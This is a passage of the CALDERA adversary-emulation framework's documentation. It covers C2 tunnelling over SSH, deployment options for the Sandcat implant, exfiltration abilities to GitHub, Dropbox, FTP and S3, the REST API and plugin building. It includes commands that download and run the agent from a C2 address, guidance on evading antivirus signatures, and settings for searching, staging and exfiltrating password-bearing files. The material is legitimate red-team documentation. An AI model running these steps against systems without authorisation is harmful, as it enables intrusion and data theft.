$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_http");
$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P
SEVENTEEN
C2 COMMUNICATIONS TUNNELING
In addition to built-in contact methods such as HTTP, DNS, TCP, and UDP, CALDERA also provides support for
tunneling C2 traffic, which supporting agents can use to mask built-in contact methods for added defense evasion.
Currently, the only available tunneling method is SSH tunneling, which is only supported by the sandcat agent.
Sandcat agents can use SSH tunneling to tunnel C2 contact mechanisms, namely HTTP(S). CALDERA also provides
built-in support to spin up a minimal local SSH server for SSH tunneling.
Within the CALDERA configuration file, adjust the following entries according to your environment:
• app.contact.tunnel.ssh.host_key_file: File name for the server’s SSH private host key. You can gen-
erate your own SSH private host key for the CALDERA server. The file must reside in the conf/ssh_keys
directory. If the CALDERA server cannot find or read the provided private host key, it will generate a temporary
RSA host key to use for operations. Although this would cause security warnings under normal circumstances,
the sandcat agent implementation of SSH tunneling does not attempt to verify hosts, and thus should not be
affected by changing or temporary host keys.
• app.contact.tunnel.ssh.host_key_passphrase: Passphrase for the server’s SSH private host key. The
server will use this passphrase to read the private host key file provided in app.contact.tunnel.ssh.
host_key_file.
• app.contact.tunnel.ssh.socket: Indicates the IP address and port that the CALDERA server will listen
on for SSH tunneling connections (e.g. 0.0.0.0:8022).
• app.contact.tunnel.ssh.user_name: User name that agents will use to authenticate to the CALDERA
server via SSH. The default value is sandcat.
• app.contact.tunnel.ssh.user_password: Password that agents will use to authenticate to the CALDERA
server via SSH. The default value is s4ndc4t!.
Once the configuration entries are set, simply start the CALDERA server up as normal via the server.py Python
program, and CALDERA will automatically attempt to start an SSH server that listens on the specified socket (app.
contact.tunnel.ssh.socket).
The contact will first attempt to read in the host private key file specified by app.contact.tunnel.ssh.
host_key_file, using the passphrase specified by app.contact.tunnel.ssh.host_key_passphrase. If it can-
not read the file for whatever reason (e.g. file does not exist, or the passphrase is incorrect), then the server will generate
its own temporary private key to use for the server.
87
caldera
The SSH server should only be used between agents and the C2 server and should not be used to SSH into the
CALDERA server manually (e.g. to manage the server remotely).
The sandcat agent is currently the only agent that supports SSH tunneling. To use it, the server, tunnelProtocol,
tunnelAddr, tunnelUser, and tunnelPassword arguments must be used.
• server value is the CALDERA server endpoint that the tunnel will connect to - if the agent is tunneling HTTP
communications through SSH, then server should be the HTTP socket for the CALDERA C2 server (e.g.
http://10.10.10.15:8888).
• tunnelProtocol value is the name of the tunneling mechanism that the agent is using. For SSH, the value must
be SSH.
• tunnelAddr is the port number or IP:port combination that indicates which port or socket to connect to via SSH
to start the tunnel (e.g. 8022 or 10.10.10.15:8022). If only a port number is provided, the agent will try to
connect to the IP address from server using the specified port. The server listening on the port/socket should
be listening for SSH connections from agents.
• tunnelUser indicates which username to use to authenticate to tunnelAddr via SSH. This username should
match the CALDERA configuration value for app.contact.tunnel.ssh.user_name.
• tunnelPassword indicates which password to use to authenticate to tunnelAddr via SSH. This password
should match the CALDERA configuration value for app.contact.tunnel.ssh.user_password.
To tunnel different contacts through SSH tunneling, simply adjust the c2 and server values as needed.
When authenticating to the provided SSH server, the sandcat agent will use the username/password provided
by the tunnelUser and tunnelPassword arguments. Whatever credentials the agent uses must reflect the
CALDERA configuration values specified in app.contact.tunnel.ssh.user_name and app.contact.tunnel.
ssh.user_password. The agent will then open a random local port to act as the local endpoint of the SSH tunnel.
This local endpoint becomes the upstream_dest value for the agent.
The following commandline will start a sandcat agent that will open up an SSH tunnel to the CALDERA c2 server at
192.168.140.1:8022, and the tunneled communications will be sent to the c2 server’s HTTP endpoint at 192.168.
140.1:8888:
server="http://192.168.140.1:8888";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.
˓→go;
chmod +x sandcat.go;
./sandcat.go -server $server -v -tunnelProtocol SSH -tunnelAddr 8022 -tunnelUser sandcat␣
˓→-tunnelPassword s4ndc4t!
The above Linux agent will produce verbose output similar to the following:
SStarting sandcat in verbose mode.
[*] Starting SSH tunnel
Starting local tunnel endpoint at localhost:52649
Setting server tunnel endpoint at 192.168.140.1:8022
Setting remote endpoint at localhost:8888
[*] Listening on local SSH tunnel endpoint
[*] SSH tunnel ready and listening on http://localhost:52649.
[*] Attempting to set channel HTTP
Beacon API=/beacon
[*] Set communication channel to HTTP
(continues on next page)
The agent connected to the C2 server via SSH at 192.168.140.1:8022 and opened a local SSH tunnel on local port
52649 that tunnels HTTP traffic to the C2 server at 192.168.140.1:8888. This is the equivalent of running ssh -L
52649:localhost:8888 sandcat@192.168.140.1 -p 8022 -N.
Note that the agent’s upstream destination endpoint is set to the local SSH tunnel endpoint at http://
localhost:54351 (the protocol is set to http since the agent is tunneling HTTP comms), while the true server
value is the final tunnel destination at http://192.168.140.1:8888.
If running the CALDERA c2 server with logging verbosity set to DEBUG, you may see output similar to the following
when an agent connects via SSH tunneling:
2021-03-26 09:12:43 - INFO (logging.py:79 log) [conn=2] Accepted SSH connection on 192.
˓→168.140.1, port 8022
2021-03-26 09:12:43 - DEBUG (logging.py:79 log) [conn=2, chan=0] Set write buffer␣
˓→limits: low-water=16384, high-water=65536
2021-03-26 09:12:43 - INFO (logging.py:79 log) [conn=2] Accepted direct TCP connection␣
˓→request to localhost, port 8888
Once the tunnel is established, operators can proceed as normal with agent activity and operations.
EIGHTEEN
UNINSTALL CALDERA
To uninstall CALDERA, navigate to the directory where CALDERA was installed and recursively remove the directory
using the following command:
rm -rf caldera/
CALDERA may leave behind artifacts from deployment of agents and operations. Remove any remaining CALDERA
agents, files, directories, or other artifacts left on your server and remote systems:
rm [ARTIFACT_NAME]
Generated reports and exfiled files are saved in /tmp on the server where CALDERA is installed.
Some examples of CALDERA artifacts left by agents (on server if agent ran locally, on clients if run remotely):
• sandcat.go: sandcat agent
• manx.go: manx agent
• nohup.out: ouput file from deployment of certain sandcat and manx agents
91
caldera
NINETEEN
TROUBLESHOOTING
1. Ensure that CALDERA has been cloned recursively. Plugins are stored in submodules and must be cloned along
with the core code.
2. Check that Python 3.7+ is installed and being used.
3. Confirm that all pip requirements have been fulfilled.
4. Run the CALDERA server with the --log DEBUG parameter to see if there is additional output.
5. Consider removing the conf/local.yml and letting CALDERA recreate the file when the server runs again.
If you get an error like ModuleNotFoundError: No module named 'plugins.manx.app' when starting
CALDERA:
1. Check to see if the plugins/manx folder is empty
1. Ensure that CALDERA has been cloned recursively. Plugins are stored in submodules and must be cloned
along with the core code.
2. Alternatively, from the plugins folder, you can run git clone https://github.com/mitre/manx.git
to grab only the manx repo.
2. Check your conf/local.yml to make sure manx is enabled
93
caldera
CALDERA has a backup, cleanup, and save procedure that runs when the key combination CTRL+C is pressed. This
is the recommended method to ensure proper shutdown of the server. If the Python process executing CALDERA is
halted abruptly (for example SIGKILL) it can cause information from plugins to get lost or configuration settings to
not reflect on a server restart.
1. Check the server logs for the incoming connection. If there is no connection:
1. Check for any output from the agent download command which could give additional information.
2. Make sure the agent is attempting to connect to the correct address (not 0.0.0.0 and likely not 127.0.0.
1).
3. Check that the listen interface is the same interface the agent is attempting to connect to.
4. Check that the firewall is open, allowing network connections, between the remote computer running the
agent and the server itself.
2. Ensure Go is properly installed (required to dynamically-compile Sandcat):
1. Make sure the Go environment variables are properly set. Ensure the PATH variable includes the Go
binaries by adding this to the /etc/profile or similar file:
export PATH=$PATH:/usr/local/go/bin
2. If there are issues with a specific package, run something like the following:
go get -u github.com/google/go-github/github
go get -u golang.org/x/oauth2
1. Run the agent with the -v flag and without the -WindowStyle hidden parameter to view output.
2. Consider removing bootstrap abilities so the console isn’t cleared.
19.5 Operations
1. Ensure that at least one agent is running before running the operation.
1. Check that the agent is running either on the server or in the agent-specific settings under last checked in
time.
2. Alternatively, clear out the running agent list using the red X’s. Wait for active agents to check in and
repopulate the table.
1. Files are encrypted by default and can be decrypted with the following utility: https://github.com/mitre/caldera/
blob/master/app/utility/file_decryptor.py
TWENTY
RESOURCES
The following file contains a list of Caldera’s abilities in comma-separated value (CSV) format.
abilities.csv
97
caldera
TWENTYONE
This document will discuss how to utilize various exfiltration abilities within CALDERA, specifically focused on the
following abilities:
• Advanced File Search and Stager
• Find Git Repositories & Compress Git Repository (local host)
• Compress Staged Directory (Password Protected) – 7z and tar+gpg
• Compress Staged Directory (Password Protected) and Break Into Smaller Files
• Exfil Compressed Archive to FTP
• Exfil Compressed Archive to Dropbox
• Exfil Compressed Archive to GitHub Repositories | Gists
– Additionally: Exfil Directory Files to Github
• Exfil Compressed Archive to S3 via AWS CLI
• Transfer Compressed Archive to Separate S3 Bucket via AWS CLI
• Scheduled Exfiltration (uses the standard HTTP C2 channel)
Note: the exfiltration abilities (to GitHub, Dropbox, FTP, and AWS) require a compressed archive with a corresponding
host.dir.compress fact unless otherwise noted.
If you want to skip straight to an example, click here
To fully capitalize on the exfiltration abilities, you will need to do a little set up on the far end to receive the exfiltrated
data.
21.1.1 Dropbox
If you do not have a Dropbox account already, you can obtain a free account (with storage size limitations) by navigating
to the signup page for a basic account and fill in the required information.
Once you have an activated account, you will navigate to the App Center and select ‘Manage’. In the left-hand toolbar
and near the bottom, select ‘Build an App’. The name will need to be unique; fill out the requested information.
Generate an access token and set it for the desired expiration time (default as of this document is 4 hours). You may
need to update your access token periodically prior to operations.
On the permissions tab, grant the application read and write access for files and folders, then submit the application.
99
caldera
Uploaded files should appear under Apps/AppName/FolderName if you elected to segregate app folders.
Chances are you already have a GitHub account if you’re using this platform. Create a new repository per the standard
instructions. If you do not already have a private access token, you can create it under Settings > Developer Settings >
Personal Access Tokens. Select if you want the token to also apply to Gists while you’re here.
You can commit directly to main if desired, or you can use a branch for your operations (just be sure to update the
fact source with the desired branch, discussed below). Keep track of your GitHub username, access token, and branch
name for the fact source.
This is a much simpler case - simply have a GitHub account and obtain an access token as described above (Settings >
Developer Settings > Personal Access Tokens). Ensure the access token also applies to Gists if you already have one.
Keep track of the access token and your username for the fact source.
21.1.4 FTP
There are a number of ways to start an FTP server depending on your OS; start the service per your operating system’s
requirements. As a note, FTP services may not like writable chroots if configured. To avoid this, either allow writeable
chroots or designate a specific folder for CALDERA uploads and supply that in the fact source.
For example, with vsftpd you can either:
• Edit /etc/vsftpd.conf to include allow_writable_chroot=YES
• Supply a writable folder in addition to the FTP server address in the CALDERA fact source. E.g. value:
192.168.1.2/upload
21.1.5 AWS
The exfiltration via AWS CLI abilities assume the AWS CLI is installed on the host machine. For use with an IAM
user, the proper credentials (access key, secret access key, and also session token if using MFA) must be provided for
the [default] profile in ~/.aws/credentials. The [default] profile may require some additional setup with the
correct region and output within ~/.aws/config.
For exfiltration to S3 bucket, the permissions must be in place to allow the [default] profile read/write accesses to
the target S3 bucket (examples: s3:ListBucket, s3:PutObject).
For transferring data to a separate S3 bucket, proper policies must be configured in the source AWS account to allow
listing (s3:ListBucket) and getting (s3:PutObject) objects from the source S3 bucket in addition to listing, putting
objects, and setting the ACL when putting (s3:PutObjectAcl) an object to the destination S3 bucket. Policies must
also be configured in the destination AWS account to allow the source AWS account to put objects and set the object’s
ACL in the destination S3 bucket. This will ensure that objects transferred to the destination account will automatically
become owned by the destination bucket owner, who will then have full control of the transferred objects.
CALDERA uses facts in its operations to collect and act upon information of import. For more general information, see
the docs. To aid in exfiltration testing, Stockpile contains a fact source for basic testing with the various facts consumed
by the abilities listed above (data/sources/2ccb822c-088a-4664-8976-91be8879bc1d). Note that this does not include
all facts used by other exfiltration abilities in CALDERA, such as those offered by the Atomic plugin.
Most of the fact source is commented-out by default excepting the search and stage ability. To plan an operation, first
consider the various file searching and staging options available. The source file contains information on the options
available to you as the user along with the required formatting and default values as examples.
Review the remaining facts and un-comment (remove the # at the start of the line) the applicable facts – both the trait
and value lines. For sections like GitHub, notes have been left regarding which facts are required for either exfil to
repositories or Gists. For example, only the first two facts below need to be un-commented and updated if using Gists:
# GitHub Exfiltration
# -------------------------------------
#- trait: github.user.name <--- Uncomment
# value: CHANGEME-BOTH <--- Uncomment & Update
#- trait: github.access.token <--- Uncomment
# value: CHANGEME-BOTH <--- Uncomment & Update
#- trait: github.repository.name
# value: CHANGEME-RepoOnly
#- trait: github.repository.branch
# value: CHANGEME-RepoOnly
If you’re planning a longer operation requiring other facts, feel free to add them to this file using the standard syntax.
21.3 Adversaries
Before diving into an example, one last thing you should be aware of: pre-built adversaries. You may already be familiar
with adversaries like Hunter and Thief – to give you a baseline, we’ve included four adversaries covering exfiltration
operations to Dropbox, FTP, and GitHub (1x Repository, 1x Gist). If you want to try them out quickly, simply create
the corresponding exfiltration destination account/service and run an operation as normal using Advanced Thief via [
Dropbox | FTP | GitHub Repo | GitHub Gist ] and the provided fact source with appropriate entries.
These adversaries work nearly identically, first finding and staging files using Advanced File Search and Stager and
compressing the staged directory via utility with a password. Once converted to an archive, the last ability is exfil to
the selected destination.
TWENTYTWO
AN EXAMPLE
First, ensure you have an account and that you have generated an access token as described above. In either the UI
(github.com) or via the command line interface, create a repository to house the exfiltrated data. If desired, additionally
create a branch. For this demo, we have selected ‘caldera-exfil-test’ as the repository and ‘demo-op’ as the branch. In
the source file, edit the section marked for GitHub as follows. In the event you choose to use the main branch, supply
that instead for the branch fact.
id: 2ccb822c-088a-4664-8976-91be8879bc1d
name: Exfil Operation
...
# GitHub Exfiltration
# -------------------------------------
- trait: github.user.name # <--- Uncommented
value: calderauser # <--- Uncommented & Updated
- trait: github.access.token # <--- Uncommented
value: ghp_dG90YWxseW1V1cG... # <--- Uncommented & Updated
- trait: github.repository.name # <--- Uncommented
value: caldera-exfil-test # <--- Uncommented & Updated
- trait: github.repository.branch # <--- Uncommented
value: demo-op # <--- Uncommented & Updated
...
With GitHub ready to go, it’s time to consider other operational facts. For this example, we will focus on a quick
smash-and-grab without any other actions. Returning to the source file, let’s look at the topic section for file search and
stage. While there are instructions in the file, we’ll cover a little more detail here.
To summarize options, you can find files by: extension and content and cull the results by providing a variety of lim-
iters: modified timeframe (default: last 30 days) and/or accessed timeframe (default: last 30 days), only searching
certain directories (e.g. c:\users or /home) or explicitly excluding directories (e.g. any “Music” folders). Addition-
ally, for Windows targets you can exclude certain extensions. This is largely to exclude executables from capture by the
content search, which the Linux command can do inherently. The included source file has default values for many of
these options but can easily be adjusted.
103
caldera
Looking first at how to identify content we want, we’ll discuss the extensions and content search. For extensions, you
can control Windows and Linux separately to account for different important file types between the operating systems.
For the extensions, you’ll note instructions in the file regarding format. These extensions should be provided in a
comma-separated list with no periods or asterisks as they are added in the payload. If you’re not picky, you can also
supply all or none.
The content search looks inside of files for the given string(s). This is shared between operating systems; simply include
your terms of import (spaces are ok!) in a comma-separated list. By default, Linux will ignore any binary files when
performing this search; Windows targets should use the excluded extensions list.
For this example, we’ll leave the default values and be sure to exclude common binary files we might find from Windows.
...
# ---- Comma-separated values, do not include '.' or '*', these are added in the payload␣
˓→if needed. Example: doc,docx
# ---- May also use 'all' for INCLUDED extensions and 'none' for EXCLUDED extensions
- trait: linux.included.extensions
value: txt,cfg,conf,yml,doc,docx,xls,xlsx,pdf,sh,jpg,p7b,p7s,p7r,p12,pfx
- trait: windows.included.extensions
value: doc,xps,xls,ppt,pps,wps,wpd,ods,odt,lwp,jtd,pdf,zip,rar,docx,url,xlsx,pptx,
˓→ppsx,pst,ost,jpg,txt,lnk,p7b,p7s,p7r,p12,pfx
value: exe,jar,dll,msi,bak,vmx,vmdx,vmdk,lck
# ---- Comma-separated values to look for. Spaces are allowed in terms. May also use
˓→'none'
- trait: file.sensitive.content
value: user,pass,username,password,uname,psw
...
With the content identified, we may want to focus our efforts on areas that might contain sensitive documents to save
time in the operation and post-processing. Adversaries have been observed using similar tactics, limiting results to
certain directories or documents seeing use in a given time period. As with the extensions and content, the provided
source file has default values set, but they can easily be changed.
First, you can choose an information cutoff date. As with the extensions, you can specify ‘none’ if you do not wish to
limit the results. You can also pick one or the other (modified or accessed) if you only care about one metric. Simply
supply a negative integer value, which represents the number of past days from today to include. We’ll leave it with the
default here.
# ---- uses a boolean "or" - if a file was accessed in the desired timeframe but not␣
˓→modified in the time frame,
Next, let’s look at the directories. You can again supply comma-separated lists of directories or a single directory.
These items will be used as the root nodes for a recursive search within. The default is c:\users and /home, but we
have changed things up here to limit it to a folder containing test files.
If searching a directory like c:\users or /home, you will likely encounter folders you (or an attacker) do not much
care for. To address this, you can supply a comma-separated list of phrases to exclude from directory paths. These do
not need to be full paths and can include spaces. For the example below, we have excluded things like “Music” and
“saved games”, folders found by default in user directories. Because these folders aren’t likely in the test folder we’re
using, these shouldn’t be issues. Be sure to account for any folders that may contain information that would violate
your organization’s policy if it were to be published to a site outside of organizational control.
# ---- Comma-separated, does not need to be full paths. May also use 'none'
- trait: windows.excluded.directories
value: links,music,saved games,contacts,videos,source,onedrive
- trait: linux.excluded.directories
value: .local,.cache,lib
22.5 Staging
Next up, we’ll discuss staging. Because this file does search and stage, users can specify where to move the files.
By default, Windows targets will stage to the user’s recycle bin and Linux targets will stage to /tmp as both of these
locations should be writable by default. In each case, the ability will create a hidden folder called “s” at these locations.
If changing the default location, be sure to include a full path. Because the Recycle Bin requires some processing to
get the user’s SID, you can instead use the string “Recycle Bin” which will be parsed into the correct location. As noted
in the instructions, if the staging directory is changed from the default, the ability does contain a fall-back in the event
the selected directory is not writable. These values are c:\users\public and /tmp.
# Include the full path or use "Recycle Bin". Fall-back in the payload file is "c:\
˓→users\public".
# Recycle Bin will attempt to create a staging folder at c:\$Recycle.Bin\{SID} which␣
˓→should be writable by default
# Takes given location and creates a hidden folder called 's' at the location.
- trait: windows.staging.location
value: Recycle Bin
# ---- Include the full path, ensure it's writable for the agent. Fallback is /tmp.␣
˓→Creates a hidden folder called .s
(continues on next page)
To support safe testing, the ability additionally has a safe mode option. It is disabled by default and will find all files
matching the parameters set before. If this fact is changed to ‘true’, you can supply an identifying value which indicates
the file is for testing. This identifying value must be at the end of the file. The default value is “_pseudo”. If Safe
Mode is enabled, CALDERA will not stage any files that do not end in “_pseudo”.
To provide a few examples, if safe mode is on with the value “_pseudo”:
• interesting_file.docx – matches the requested extension – will not be staged
• interesting_content.txt – matches the requested content – will not be staged
• interesting_pseudo_data.doc – matches the requested content – will not be staged because “_pseudo” is
in the wrong place
• uninteresting_file_pseudo.random – doesn’t match the requested extension – will not be staged despite
the “_pseudo”
• interesting_file_pseudo.docx – matches the requested extension – will be staged
• interesting_content_pseudo.txt – that matches the requested content – will be staged
# ---- Safe Mode - Only stages files with the appropriate file ending if enabled (e.g.␣
˓→report_pseudo.docx)
- trait: safe.mode.enabled
value: false
- trait: pseudo.data.identifier
value: _pseudo
For this demonstration, we will be using the password-protected archive ability added in this update. The source
contains a default value of C4ld3ra but can be changed to anything if more security is required (e.g., real files used in
testing). As noted in the source file, certain special characters may be escaped when inserted into the command. This
may result in a different password than what you entered - view the operation logs to see exactly what was used. You
should still be able to decrypt the archive, but will need to include any escape characters added during the operation.
For example, Pa$$word may have become Pa\$\$word or Pa`$`$word.
# Encrypted Compression
# Note: For passwords with special characters like # and $, you may need to include␣
˓→escapes (\ or `)
# when re-entering the password to decrypt the archive. Examine the operation output␣
˓→to see the exact password used.
# If using special characters, put the password in 'single quotes' here to prevent␣
˓→parser errors.
# -------------------------------------
- trait: host.archive.password
value: C4ld3ra
22.7 Operation
TWENTYTHREE
WRAP-UP
That about does it! If you have any questions, please reach out to the team on Slack.
109
caldera
TWENTYFOUR
The Sandcat plugin provides CALDERA with its default agent implant, Sandcat. The agent is written in GoLang for
cross-platform compatibility and can currently be compiled to run on Windows, Linux, and MacOS targets.
While the CALDERA C2 server requires GoLang to be installed in order to compile agent binaries, no installation is
required on target machines - the agent program will simply run as an executable.
The sandcat plugin does come with precompiled binaries, but these only contain the basic agent features and are more
likely to be flagged by AV as they are publicly available on GitHub.
If you wish to dynamically compile agents to produce new hashes or include additional agent features, the C2 server
must have GoLang installed.
The source code for the sandcat agent is located in the gocat and gocat-extensions directories. gocat contains the
core agent code, which provides all of the basic features. gocat-extensions contains source code for extensions that
can be compiled into new agent binaries on demand. The extensions are kept separate to keep the agent lightweight
and to allow more flexibility when catering to various use cases.
Precompiled agent binaries are located in the payloads directory and are referenced with the following filename:
• sandcat.go-darwin compiled binary for Mac targets
• sandcat.go-linux compiled binary for Linux targets
• sandcat.go-windows compiled binary for Windows targets.
These files get updated when dynamically compiling agents, so they will always contain the latest compiled version on
your system.
111
caldera
24.3 Deploy
To deploy Sandcat, use one of the built-in delivery commands from the main server GUI which allows you to run the
agent on Windows, Mac, or Linux.
Each of these commands downloads a compiled Sandcat executable from CALDERA and runs it immediately.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands
above, the agent will re-compile itself dynamically to obtain a new file hash. This will help bypass file-
based signature detections.
24.3.1 Options
When running the Sandcat agent binary, there are optional parameters you can use when you start the executable:
• -server [C2 endpoint]: This is the location (e.g. HTTP URL, IPv4:port string) that the agent will use to
reach the C2 server. (e.g. -server http://10.0.0.1:8888, -server 10.0.0.1:53, -server https://
example.com). The agent must have connectivity to this endpoint.
• -group [group name]: This is the group name that you would like the agent to join when it starts. The group
does not have to exist beforehand. A default group of red will be used if this option is not provided (e.g. -group
red, -group mygroup)
• -v: Toggle verbose output from sandcat. If this flag is not set, sandcat will run silently. This only applies to
output that would be displayed on the target machine, for instance if running sandcat from a terminal window.
This option does not affect the information that gets sent to the C2 server.
• -httpProxyGateway [gateway]: Sets the HTTP proxy gateway if running Sandcat in environments that use
proxies to reach the internet
• -paw [identifier]: Optionally assign the agent with an identifier value. By default, the agent will be assigned
a random identifier by the C2 server.
• -c2 [C2 method name]: Instruct the agent to connect to the C2 server using the given C2 communication
method. By default, the agent will use HTTP(S). The following C2 channels are currently supported:
– HTTP(S) (-c2 HTTP, or simply exclude the c2 option)
– DNS Tunneling (-c2 DnsTunneling): requires the agent to be compiled with the DNS tunneling exten-
sion.
– FTP (-c2 FTP): requires the agent to be compiled with the FTP extension
– Github GIST (-c2 GIST): requires the agent to be compiled with the Github Gist extension
– Slack (-c2 Slack): requires the agent to be compiled with the Slack extension
– SMB Pipes (-c2 SmbPipe): allows the agent to connect to another agent peer via SMB pipes to route
traffic through an agent proxy to the C2 server. Cannot be used to connect directly to the C2. Requires the
agent to be compiled with the proxy_smb_pipe SMB pipe extension.
• -delay [number of seconds]: pause the agent for the specified number of seconds before running
• -listenP2P: Toggle peer-to-peer listening mode. When enabled, the agent will listen for and accept peer-to-peer
connections from other agents. This feature can be leveraged in environments where users want agents within
an internal network to proxy through another agent in order to connect to the C2 server.
• -originLinkID [link ID]: associated the agent with the operation instruction with the given link ID. This
allows the C2 server to map out lateral movement by determining which operation instructions spawned which
agents.
Additionally, the sandcat agent can tunnel its communications to the C2 using the following options (for more details,
see the C2 tunneling documentation
24.4 Extensions
In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality.
Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension is temporarily
added to the existing core sandcat code to provide functionality such as peer-to-peer proxy implementations, additional
executors, and additional C2 communication protocols.
To request particular extensions, users must include the gocat-extensions HTTP header when asking the C2 to
compile an agent. The header value must be a comma-separated list of requested extensions. The server will include
the extensions in the binary if they exist and if their dependencies are met (i.e. if the extension requires a particular
GoLang module that is not installed on the server, then the extension will not be included).
Below is an example PowerShell snippet to request the C2 server to include the proxy_http and shells extensions:
– github.com/jlaffaye/ftp
• slack: provides the Slack C2 communication protocol.
• proxy_http: allows the agent to accept peer-to-peer messages via HTTP. Not required if the agent is simply
using HTTP to connect to a peer (acts the same as connecting direclty to the C2 server over HTTP).
• proxy_smb_pipe: provides the SmbPipe peer-to-peer proxy client and receiver for Windows (peer-to-peer com-
munication via SMB named pipes).
– Requires the gopkg.in/natefinch/npipe.v2 GoLang module
Executor Extensions
• shells: provides the osascript (Mac Osascript), pwsh (Windows powershell core), and Python (python2
and python3) executors.
• shellcode: provides the shellcode executors.
• native: provides basic native execution functionality, which leverages GoLang code to perform tasks rather
than calling external binaries or commands.
• native_aws: provides native execution functionality specific to AWS. Does not require the native extension,
but does require the following GoLang modules:
– github.com/aws/aws-sdk-go
– github.com/aws/aws-sdk-go/aws
• donut: provides the Donut functionality to execute certain .NET executables in memory. See
https://github.com/TheWover/donut for additional information.
Other Extensions
• shared extension provides the C sharing functionality for Sandcat. This can be used to compile Sandcat as a
DLL rather than a .exe for Windows targets.
It is possible to customize the default values of these options when pulling Sandcat from the CALDERA server.
This is useful if you want to hide the parameters from the process tree or if you cannot specify arguments when executing
the agent binary.
You can do this by passing the values in as headers when requesting the agent binary from the C2 server instead of as
parameters when executing the binary.
The following parameters can be specified this way:
• server
• group
• listenP2P
For example, the following will download a linux executable that will use http://10.0.0.2:8888 as the server
address instead of http://localhost:8888, will set the group name to mygroup instead of the default red, and will
enable the P2P listener:
Additionally, if you want the C2 server to compile the agent with a built-in list of known peers (agents that are actively
listening for peer-to-peer requests), you can do so with the following header:
• includeProxyPeers Example usage:
• includeProxyPeers:all - include all peers, regardless of what proxy methods they are listening on
• includeProxypeers:SmbPipe - only include peers listening for SMB pipe proxy traffic
• includeProxypeers:HTTP - only include peers listening for HTTP proxy traffic.
The following section contains information intended to help developers understand the inner workings of the
CALDERA adversary emulation tool, CALDERA plugins, or new tools that interface with the CALDERA server.
24.5. Customizing Default Options & Execution Without CLI Options 115
caldera
TWENTYFIVE
Note: The original REST API has been deprecated. The new REST API v2 has been released, with documentation
available here after server startup. Alternatively, this can be viewed by scrolling to the bottom of the CALDERA
navigation menu and selecting “api docs.”
All REST API functionality can be viewed in the rest_api.py module in the source code.
25.1 /api/rest
You can interact with all parts of CALDERA through the core REST API endpoint /api/rest. If you send requests to
“localhost” - you are not required to pass a key header. If you send requests to 127.0.0.1 or any other IP addresses, the
key header is required. You can set the API key in the conf/default.yml file. Some examples below will use the header,
others will not, for example.
Any request to this endpoint must include an “index” as part of the request, which routes it to the appropriate
object type.
Here are the available REST API functions:
25.2 Agents
25.2.1 DELETE
25.2.2 POST
117
caldera
You can optionally POST an obfuscator and/or a facts dictionary with key/value pairs to fill in any variables
the chosen ability requires.
{"paw":"$PAW","ability_id":"$ABILITY_ID","obfuscator":"base64","facts":[{"name":"username
˓→","value":"admin"},{"name":"password", "value":"123"}]}
25.3 Adversaries
View all abilities for a specific adversary_id (the UUID of the adversary).
25.4 Operations
25.4.1 DELETE
25.4.2 POST
Change the state of any operation. In addition to finished, you can also use: paused, run_one_link or running.
25.4.3 PUT
Create a new operation. All that is required is the operation name, similar to creating a new operation in the browser.
25.5 /file/upload
Files can be uploaded to CALDERA by POST’ing a file to the /file/upload endpoint. Uploaded files will be put in the
exfil_dir location specified in the default.yml file.
25.5.1 Example
25.6 /file/download
Files can be dowloaded from CALDERA through the /file/download endpoint. This endpoint requires an HTTP header
called “file” with the file name as the value. When a file is requested, CALDERA will look inside each of the payload
directories listed in the local.yml file until it finds a file matching the name.
Files can also be downloaded indirectly through the payload block of an ability.
Additionally, the Sandcat plugin delivery commands utilize the file download endpoint to drop the agent
on a host
25.6.1 Example
TWENTYSIX
Building your own plugin allows you to add custom functionality to CALDERA.
A plugin can be nearly anything, from a RAT/agent (like Sandcat) to a new GUI or a collection of abilities that you
want to keep in “closed-source”.
Plugins are stored in the plugins directory. If a plugin is also listed in the local.yml file, it will be loaded into CALDERA
each time the server starts. A plugin is loaded through its hook.py file, which is “hooked” into the core system via the
server.py (main) module.
When constructing your own plugins, you should avoid importing modules from the core code base, as
these can change. There are two exceptions to this rule
1. The services dict() passed to each plugin can be used freely. Only utilize the public functions on
these services however. These functions will be defined on the services’ corresponding interface.
2. Any c_object that implements the FirstClassObjectInterface. Only call the functions on this interface,
as the others are subject to changing.
This guide is useful as it covers how to create a simple plugin from scratch. However, if this is old news to you and
you’re looking for an even faster start, consider trying out Skeleton (a plugin for building other plugins). Skeleton will
generate a new plugin directory that contains all the standard boilerplate.
Start by creating a new directory called “abilities” in CALDERA’s plugins directory. In this directory, create a hook.py
file and ensure it looks like this:
name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = None
The name should always be a single word, the description a phrase, and the address should be None, unless your plugin
exposes new GUI pages. Our example plugin will be called “abilities”.
121
caldera
The enable function is what gets hooked into CALDERA at boot time. This function accepts one parameter:
1. services: a list of core services that CALDERA creates at boot time, which allow you to interact with the core
system in a safe manner.
Core services can be found in the app/services directory.
Now it’s time to fill in your own enable function. Let’s start by appending a new REST API endpoint to the server.
When this endpoint is hit, we will direct the request to a new class (AbilityFetcher) and function (get_abilities). The
full hook.py file now looks like:
name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = None
class AbilityFetcher:
Now that our initialize function is filled in, let’s add the plugin to the default.yml file and restart CALDERA. Once
running, in a browser or via cURL, navigate to 127.0.0.1:8888/get/abilities. If all worked, you should get a JSON
response back, with all the abilities within CALDERA.
Now we have a usable plugin, but we want to make it more visually appealing.
Start by creating a “templates” directory inside your plugin directory (abilities). Inside the templates directory, create
a new file called abilities.html. Ensure the content looks like:
<h1 style="font-size:70px;margin-top:-20px;">Abilities</h1>
</div>
<div class="column" style="flex:75%;padding:15px;text-align: left">
<div>
{% for a in abilities %}
<pre style="color:grey">{{ a }}</pre>
<hr>
{% endfor %}
</div>
</div>
</div>
</div>
Then, back in your hook.py file, let’s fill in the address variable and ensure we return the new abilities.html page when
a user requests 127.0.0.1/get/abilities. Here is the full hook.py:
name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = '/plugin/abilities/gui'
class AbilityFetcher:
def __init__(self, services):
self.services = services
self.auth_svc = services.get('auth_svc')
